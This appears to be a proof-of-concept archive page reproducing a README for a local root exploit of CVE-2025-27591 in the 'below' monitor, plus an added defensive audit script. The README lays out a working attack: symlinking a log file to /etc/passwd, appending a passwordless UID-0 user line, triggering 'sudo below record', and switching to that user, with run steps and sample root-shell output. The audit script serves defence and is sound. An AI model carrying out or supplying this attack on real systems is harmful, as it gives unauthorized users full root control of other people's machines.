POC details: 46e0f51d28472c8cc1b33c7df0f8c19784bf30bc

Source
Related vulnerability
Title: below security vulnerability (CVE-2025-27591)
Description: below is a resource monitor for modern Linux systems, open-sourced by Meta Incubator. Versions of below before v0.9.0 contain a security vulnerability: the program creates a world-writable directory, which may allow escalation to root privileges through a symlink attack.
Description
🔥 Local Privilege Escalation Exploit for CVE-2025-27591 | Abuses world-writable log dir in Below to gain root via /etc/passwd injection
Introduction
# CVE-2025-27591 – Privilege Escalation via Symlink Abuse in `below`

[![Author](https://img.shields.io/badge/author-00xCanelo-blue)](https://github.com/00xCanelo)
[![CVE](https://img.shields.io/badge/CVE-2025--27591-critical-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591)

> 🛑 **Disclaimer**: This exploit is provided **for educational and authorized security testing only**. Unauthorized use may be illegal.

---

## 🧠 Overview

`below` is a performance monitoring tool developed by Facebook (Meta) for Linux systems. Versions of `below` before v0.9.0 are affected by a critical vulnerability that allows **unprivileged users** to escalate to **root** by exploiting a **world-writable log directory** and unsanitized log file handling.

---

### 🔎 CVE Details

| Field            | Value                                          |
|------------------|------------------------------------------------|
| **CVE-ID**       | [CVE-2025-27591](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591) |
| **Severity**     | 🔥 Critical (CVSS ≈ 7.8 - 8.8)                 |
| **Attack Vector**| Local                                          |
| **Impact**       | Privilege Escalation to root (UID=0)           |
| **Exploit Type** | Symlink Abuse / Log File Injection             |
| **Affected App** | `below` – typically installed as `/usr/bin/below` |
| **Root Cause**   | Unsafe file writes to `/var/log/below/` without permission checks |

---

## 💥 Exploit Logic

This Bash script performs the following:

1. **Check for World-Writable Directory**:
   - Confirms that `/var/log/below` is world-writable (a red flag).

2. **Prepare Symlink Attack**:
   - Deletes existing `error_root.log` (if any) and creates a symbolic link to `/etc/passwd`.

3. **Payload Construction**:
   - Appends a fake root user to `/etc/passwd`:  
     ```
     fakeadmin::0:0:fakeadmin:/root:/bin/bash
     ```

4. **Trigger Logging**:
   - Runs `sudo below record` to force the vulnerable binary to write logs.

5. **Gain Root Access**:
   - Uses `su fakeadmin` to obtain a root shell with no password prompt.
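
The two conditions the logic above relies on, a world-writable log directory and a log-file name that is really a symlink to a file outside it, are exactly what a defender should audit for. The following POSIX shell script is an added example written for this page; it is not part of the exploit repository or of `below` itself. It takes the directory as an argument (on a real host that would be `/var/log/below`), reports both conditions with a bitmask exit status, and applies the conventional hardening of mode 0755 on a root-owned log directory. The demo builds a throwaway directory under `mktemp` with a constructed target file, so it runs without root and without `below` installed.

```shell
#!/bin/sh
# Added defensive audit for the CVE-2025-27591 preconditions (example code for
# this page, not from the exploit repository or from below). Checks a log
# directory for (1) world-writability and (2) symlinks resolving outside it.

# audit_below_logdir DIR
# Exit status is a bitmask: 0 clean, 1 world-writable, 2 escaping symlink, 3 both.
audit_below_logdir() {
    dir=$1
    rc=0
    if [ ! -d "$dir" ]; then
        echo "[-] $dir does not exist, nothing to audit"
        return 0
    fi

    # 'ls -ld' prints e.g. drwxrwxrwx; character 9 is the 'other' write bit.
    if [ "$(ls -ld "$dir" | cut -c9)" = "w" ]; then
        echo "[!] $dir is world-writable: any local user can plant entries here"
        rc=$((rc | 1))
    fi

    # A symlink whose resolved target lies outside DIR redirects any append a
    # privileged process performs on that log name to the target file.
    absdir=$(cd "$dir" && pwd -P)
    for entry in "$dir"/* "$dir"/.*; do
        [ -L "$entry" ] || continue
        target=$(readlink -f "$entry" 2>/dev/null) || target=$(readlink "$entry")
        case "$target" in
            "$absdir"/*) ;;   # stays inside the log directory: acceptable
            *)
                echo "[!] $entry -> $target points outside $dir"
                rc=$((rc | 2))
                ;;
        esac
    done
    return "$rc"
}

# harden_below_logdir DIR
# Applies 0755 so only the owner can create entries, then re-runs the audit so
# any remaining escaping symlink is reported for an operator to inspect rather
# than silently deleted. On a real host the directory must also be owned by
# root (chown root:root DIR), which needs root and is left out of the demo.
harden_below_logdir() {
    dir=$1
    chmod 0755 "$dir" || return 1
    audit_below_logdir "$dir"
}

# Demo on a constructed directory: a world-writable "below" log dir holding
# error_root.log as a symlink to a constructed stand-in for a sensitive file.
demo() {
    tmp=$(mktemp -d)
    mkdir "$tmp/below" && chmod 0777 "$tmp/below"
    : > "$tmp/target_file"
    ln -s "$tmp/target_file" "$tmp/below/error_root.log"
    audit_below_logdir "$tmp/below"; echo "audit exit status: $?"
    harden_below_logdir "$tmp/below"; echo "after hardening: $?"
    rm -rf "$tmp"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

Run it as `sh audit_below.sh demo` to see both findings on the constructed directory, or point `audit_below_logdir` at `/var/log/below` on a host where `below` is installed. A non-zero exit status is a cheap signal for a cron job or configuration-management check; the symlink test is deliberately separate from the permission test because a directory fixed to 0755 can still carry a symlink planted earlier.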

---

## 📁 Directory Structure

```text
CVE-2025-27591/
├── exploit.sh
├── README.md
```

## ✅ Prerequisites

Before running the exploit, ensure you have the following:

- Bash shell (Linux system)
- The vulnerable binary installed: `/usr/bin/below`
- World-writable log directory: `/var/log/below`
- `sudo` privileges to execute: `sudo below record`
- Tools available:
  - `ln` (to create symlinks)
  - `su` (to switch users)
  - `timeout` (to control execution time)
  - `whoami` (for privilege check)

---

## 🚀 Exploitation Steps

```bash
# 1. Clone the repository
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. Make the script executable
chmod +x exploit.sh

# 3. Execute the exploit
./exploit.sh
```

## 🧪 Sample Output

```bash
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd

[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)

[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.

[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
```

File snapshot

```text
[4.0K] /data/pocs/46e0f51d28472c8cc1b33c7df0f8c19784bf30bc
├── [2.4K] exploit.sh
└── [3.4K] README.md

0 directories, 2 files
```